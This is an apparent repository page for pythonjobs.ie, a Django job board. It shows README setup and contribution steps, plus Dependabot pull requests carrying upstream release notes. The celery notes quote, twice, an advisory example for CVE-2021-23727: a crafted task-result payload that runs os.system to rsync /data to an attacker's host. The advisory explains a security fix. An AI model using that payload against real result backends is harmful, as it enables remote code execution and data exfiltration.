Python jobs Ireland

kimeraapp, updated 🕥 2022-01-21 18:59:50

pythonjobs.ie

Python Jobs Ireland: find or post Python related jobs without registration.

pythonjobs.ie is made for and by Python Ireland community members. It is a free of charge site useful for recruiters and developers, please feel free to contribute (read the instructions for development and our code of conduct) with code or opening any issue you can find.

pythonjobs_ie

Development

Environment

If you don't have Python you can follow the instructions from https://www.python.org/downloads/.

Make sure to install Python 3.x instead of the default 2.x

First, create an environment. $ virtualenv env If you have both python 2.x and 3.x versions, use the below command. $ virtualenv --python=/usr/bin/python3 env You can activate it. $ source ./env/bin/activate Verify the version of python from the 1st line by the below command. ``` $ python Python 2.7.6 (default, Jun 22 2015, 17:58:13) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information.

When not using you can deactivate it. $ deactivate ```

Project

Fork the repository and clone into you local computer.

$ git clone [email protected]:MYUSERNAME/pythonjobs.ie.git $ cd pythonjobs.ie $ pip install -r requirements.txt $ ./manage.py migrate $ ./manage.py runserver 127.0.0.1:8000

Development guidelines

Always create a new branch for the new feature/issue. $ git checkout -b feature-name-branch Then make your changes and commit. Last of the commit could include the issue number in the message, like: fixes #1 or closes #1. Add yourself to the CONTRIBUTORS file. $ git commit -am 'descriptive message about the issue' Please check always that the tests are running before pushing anything, you might consider to fix it before making the pull request. Add tests when possible for your own code and test that the app works accordingly. $ ./manage.py test Push the branch to your Github account. $ git push origin feature-name-branch To keep sync with the main repository you will have to add it as a second repository. This will only be available for pulling the latest changes. $ git remote add upstream https://github.com/kimeraapp/pythonjobs.ie.git $ git pull upstream master Now go to Github and make the pull request. Add a descriptive comment and you can include 'Resolve #1' to close the issue when the pull request is merged.

If you the pull request has conflicts you have to pull from the upstream, fix them and just push to your remote branch again. There is no need to make another pull request.

Code styling

PEP8 is used in this project. Please make sure you follow the documentation: https://www.python.org/dev/peps/pep-0008/.

4 spaces are used for Python identation and 2 for the HTML templates and CSS.

Setup your line limit to 80 chars.

Instead of comments use descriptive names and keep consistency with the current style. You can explain better either in the commit message or the pull request description, but the code should be easy to review. When in doubt, please feel free to comment on the issue.

Issues

Bump ipython from 4.0.0 to 7.16.3

opened on 2022-01-21 18:59:49 by dependabot[bot]

Bumps ipython from 4.0.0 to 7.16.3.

Commits

d43c7c7 release 7.16.3
5fa1e40 Merge pull request from GHSA-pq7m-3gw7-gq5x
8df8971 back to dev
9f477b7 release 7.16.2
138f266 bring back release helper from master branch
5aa3634 Merge pull request #13341 from meeseeksmachine/auto-backport-of-pr-13335-on-7...
bcae8e0 Backport PR #13335: What's new 7.16.2
8fcdcd3 Pin Jedi to <0.17.2.
2486838 release 7.16.1
20bdc6f fix conda build
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) - `@dependabot use these labels` will set the current labels as the default for future PRs for this repo and language - `@dependabot use these reviewers` will set the current reviewers as the default for future PRs for this repo and language - `@dependabot use these assignees` will set the current assignees as the default for future PRs for this repo and language - `@dependabot use this milestone` will set the current milestone as the default for future PRs for this repo and language You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/kimeraapp/pythonjobs.ie/network/alerts).

Bump celery from 3.1.18 to 5.2.2

opened on 2022-01-06 22:23:02 by dependabot[bot]

Bumps celery from 3.1.18 to 5.2.2.

Release notes

Sourced from celery's releases.

5.2.2

Release date: 2021-12-26 16:30 P.M UTC+2:00

Release by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:
{
      "exc_module": "os",
      'exc_type': "system",
      "exc_message": "rsync /data [email protected]:~/data"
}
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
v5.2.1

Release date: 2021-11-16 8.55 P.M UTC+6:00

Release by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.

Pass logfile to ExecStop in celery.service example systemd file.

fix: reduce latency of AsyncResult.get under gevent (#7052)

Limit redis version: <4.0.0.

Bump min kombu version to 5.2.2.

Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

... (truncated)

Changelog

Sourced from celery's changelog.

5.2.2

:release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz
Various documentation fixes.
Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

.. code-block:: python
  {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data [email protected]:~/data"
  }
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
.. _version-5.2.1:

5.2.1

:release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.

Pass logfile to ExecStop in celery.service example systemd file.

fix: reduce latency of AsyncResult.get under gevent (#7052)

Limit redis version: <4.0.0.

Bump min kombu version to 5.2.2.

... (truncated)

Commits

b21c13d Bump version: 5.2.1 → 5.2.2
a60b486 Add changelog for 5.2.2.
3e5d630 Fix changelog formatting.
1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).
2d8dbc2 Update configuration.rst
9596aba Fix typo in documentation
639ad83 update doc to reflect Celery 5.2.x (#7153)
d32356c Bump version: 5.2.0 → 5.2.1
6842a78 Merge branch 'master' of https://github.com/celery/celery
4c92cb7 changelog for v5.2.1
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

Bump django from 1.8.4 to 2.2.24

opened on 2021-06-10 17:51:02 by dependabot[bot]

Bumps django from 1.8.4 to 2.2.24.

Commits

2da029d [2.2.x] Bumped version for 2.2.24 release.
f27c38a [2.2.x] Fixed CVE-2021-33571 -- Prevented leading zeros in IPv4 addresses.
053cc95 [2.2.x] Fixed CVE-2021-33203 -- Fixed potential path-traversal via admindocs'...
6229d87 [2.2.x] Confirmed release date for Django 2.2.24.
f163ad5 [2.2.x] Added stub release notes and date for Django 2.2.24.
bed1755 [2.2.x] Changed IRC references to Libera.Chat.
63f0d7a [2.2.x] Refs #32718 -- Fixed file_storage.test_generate_filename and model_fi...
5fe4970 [2.2.x] Post-release version bump.
61f814f [2.2.x] Bumped version for 2.2.23 release.
b8ecb06 [2.2.x] Fixed #32718 -- Relaxed file name validation in FileField.
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

Bump pyyaml from 3.11 to 5.4

opened on 2021-03-25 21:38:26 by dependabot[bot]

Bumps pyyaml from 3.11 to 5.4.

Changelog

Sourced from pyyaml's changelog.

5.4 (2021-01-19)

yaml/pyyaml#407 -- Build modernization, remove distutils, fix metadata, build wheels, CI to GHA

yaml/pyyaml#472 -- Fix for CVE-2020-14343, moves arbitrary python tags to UnsafeLoader

yaml/pyyaml#441 -- Fix memory leak in implicit resolver setup

yaml/pyyaml#392 -- Fix py2 copy support for timezone objects

yaml/pyyaml#378 -- Fix compatibility with Jython

5.3.1 (2020-03-18)

yaml/pyyaml#386 -- Prevents arbitrary code execution during python/object/new constructor

5.3 (2020-01-06)

yaml/pyyaml#290 -- Use is instead of equality for comparing with None

yaml/pyyaml#270 -- Fix typos and stylistic nit

yaml/pyyaml#309 -- Fix up small typo

yaml/pyyaml#161 -- Fix handling of slots

yaml/pyyaml#358 -- Allow calling add_multi_constructor with None

yaml/pyyaml#285 -- Add use of safe_load() function in README

yaml/pyyaml#351 -- Fix reader for Unicode code points over 0xFFFF

yaml/pyyaml#360 -- Enable certain unicode tests when maxunicode not > 0xffff

yaml/pyyaml#359 -- Use full_load in yaml-highlight example

yaml/pyyaml#244 -- Document that PyYAML is implemented with Cython

yaml/pyyaml#329 -- Fix for Python 3.10

yaml/pyyaml#310 -- Increase size of index, line, and column fields

yaml/pyyaml#260 -- Remove some unused imports

yaml/pyyaml#163 -- Create timezone-aware datetimes when parsed as such

yaml/pyyaml#363 -- Add tests for timezone

5.2 (2019-12-02)

Repair incompatibilities introduced with 5.1. The default Loader was changed, but several methods like add_constructor still used the old default yaml/pyyaml#279 -- A more flexible fix for custom tag constructors yaml/pyyaml#287 -- Change default loader for yaml.add_constructor yaml/pyyaml#305 -- Change default loader for add_implicit_resolver, add_path_resolver

Make FullLoader safer by removing python/object/apply from the default FullLoader yaml/pyyaml#347 -- Move constructor for object/apply to UnsafeConstructor

Fix bug introduced in 5.1 where quoting went wrong on systems with sys.maxunicode <= 0xffff yaml/pyyaml#276 -- Fix logic for quoting special characters

Other PRs: yaml/pyyaml#280 -- Update CHANGES for 5.1

5.1.2 (2019-07-30)

Re-release of 5.1 with regenerated Cython sources to build properly for Python 3.8b2+

... (truncated)

Commits

58d0cb7 5.4 release
a60f7a1 Fix compatibility with Jython
ee98abd Run CI on PR base branch changes
ddf2033 constructor.timezone: _copy & deepcopy
fc914d5 Avoid repeatedly appending to yaml_implicit_resolvers
a001f27 Fix for CVE-2020-14343
fe15062 Add 3.9 to appveyor file for completeness sake
1e1c7fb Add a newline character to end of pyproject.toml
0b6b7d6 Start sentences and phrases for capital letters
c976915 Shell code improvements
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

Notify the applicant via mail

opened on 2020-11-09 09:05:12 by farhank1221

Hey I have this idea of adding a script to notify the applicant via the mail when the applicant applies for a job.

Moved generate token logic

opened on 2019-10-22 14:41:18 by siarheipuhach None

Releases

First release 2015-09-27 18:56:15

Kimera

GitHub Repository Homepage